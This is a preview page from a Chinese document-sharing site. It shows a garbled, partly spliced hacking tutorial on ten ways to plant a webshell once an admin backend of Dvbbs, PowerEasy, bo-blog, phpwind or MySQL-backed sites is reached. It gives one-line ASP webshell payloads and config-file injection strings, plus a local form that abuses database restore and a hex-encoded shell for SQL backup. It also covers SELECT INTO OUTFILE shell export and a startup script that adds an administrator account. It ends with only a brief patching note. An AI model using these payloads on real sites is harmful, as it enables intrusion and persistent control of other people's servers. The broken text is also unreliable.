返回
从后台得到webshell十大技巧大汇总

从后台得到webshell十大技巧大汇总

ID:24531175

大小:50.50 KB

页数:4页

时间:2018-11-15

从后台得到webshell十大技巧大汇总_第1页
从后台得到webshell十大技巧大汇总_第2页
从后台得到webshell十大技巧大汇总_第3页
从后台得到webshell十大技巧大汇总_第4页
资源描述:

《从后台得到webshell十大技巧大汇总》由会员上传分享,免费在线阅读,更多相关内容在工程资料-天天文库

1、从后台得到webshell十大技巧大汇总~教育资源库  前言  动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站s/images/smiles/下,前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名,bo-blog后台可以可以直接上传.php文件,上传的文件路径有提示。以及一年前十分流行的upfile.asp漏洞(动网

2、5.0和6.0、早期的许多整站系统),因过滤上传文件不严,导致用户可以直接上传BoardLink.asp就是我们想要的shell。  四、利用后台管理向配置文件写ail=hacker263.:evalrequest(chr(35))//,还有一种方法就是写上hacker263.%><%evalrequest(chr(35))%><%',这样就会形成前后对应,最小马也就运行了。<%evalrequest(chr(35))%>可以用lake2的eval发送端以及最新的2006客户端来连,需要说明的是数据库插马时候要选前者。再如动易2005,到文章中心管理-顶部菜单设

3、置-菜单其它特效,插入一句话马%><%executerequest(l)%><%',保存顶部栏目菜单参数设置成功后,我们就得到马地址网站/admin/rootclass_menu_config.asp。  五、利用后台数据库备份及恢复获得sssql版的程序就直接应用了access版的代码,导致sql版照样可以利用。还可以备份网站asp文件为其他后缀如.txt文件,从而可以查看并获得网页源代码,并获得更多的程序信息增加获得ssql系统  这里需要提一点动网mssql版,但是可以直接本地提交来备份的。首先在发帖那上传一个写有asp代码的假图片,然后记住其上传路径。写

4、一个本地提交的表单,代码如下:  <formaction=网站/bbs/admin_data.asp?action=RestoreDataact=Restoremethod=post>  <p>已上传文件的位置:<inputname=Dbpathtyp12下一页友情提醒:,特别!e=textsize=80></p>  <p>要复制到的位置:<inputname=backpathtype=textsize=80></p>  <p><inputtype=submitvalue=提交></p></form>  另存为.htm本地执行。把假图片上传路径填在已上传文件的位置那里,

5、想要备份的AT--  这段代码中,0x626273是要备份的库名bbs的十六进制,可以是其他名字比如bbs.bak;0x3C2565786563757465207265717565737428226C2229253E是<%executerequest(l)%>的十六进制,是lp最小马;0x643A5C7765625C312E617370是d:ysql系统  后台需要有mysql数据查询功能,我们就可以利用它执行SELECT...INTOOUTFILE查询输出php文件,因为所有的数据是存放在mysql里的,所以我们可以通过正常手段把我们的ysql在利用SELECT...

6、INTOOUTFILE语句导出shell。  就可以暴出路径,php环境中比较容易暴出绝对路径:)。提一点的是遇到是mysql在win系统下路径应该这样写。下面的方法是比较常用的一个导出webshell的方法,也可以写个vbs添加系统管理员的脚本导出到启动文件夹,系统重起后就会添加一个管理员帐号  就会在up目录下生成文件名为saiy.php内容为的最小php木马,最后用lanker的客户端来连接。实际运用中要考虑到文件夹是否有写权限。或者输入这样的代码将会在当前目录生成一个a.php的最小马。  九、phpwind论坛从后台到webshell的三种方式  方式1模板法

7、  进入后台,风格模版设置,在随便一行写代码,记住,这代码必须顶着左边行写,代码前面不可以有任何字符。  方始2脏话过滤法  方式3用户等级管理  以上三种方式得到webshellr的密码是a,为lanker的一句话后门服务端。  十、也可以利用网站访问计数系统记录来获得webshell  解决方案  由于本文涉及的代码版本很多,所以不可能提供一个完美的解决方案。有能力者可以针对本文提到的漏洞文件进行适当修补,若漏洞文件不影响系统使用也可删除此文件。大家如果不会修补,可以到相关官方网站下载最新补丁进行修复更新。同时也请大家能时刻关注各大安

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。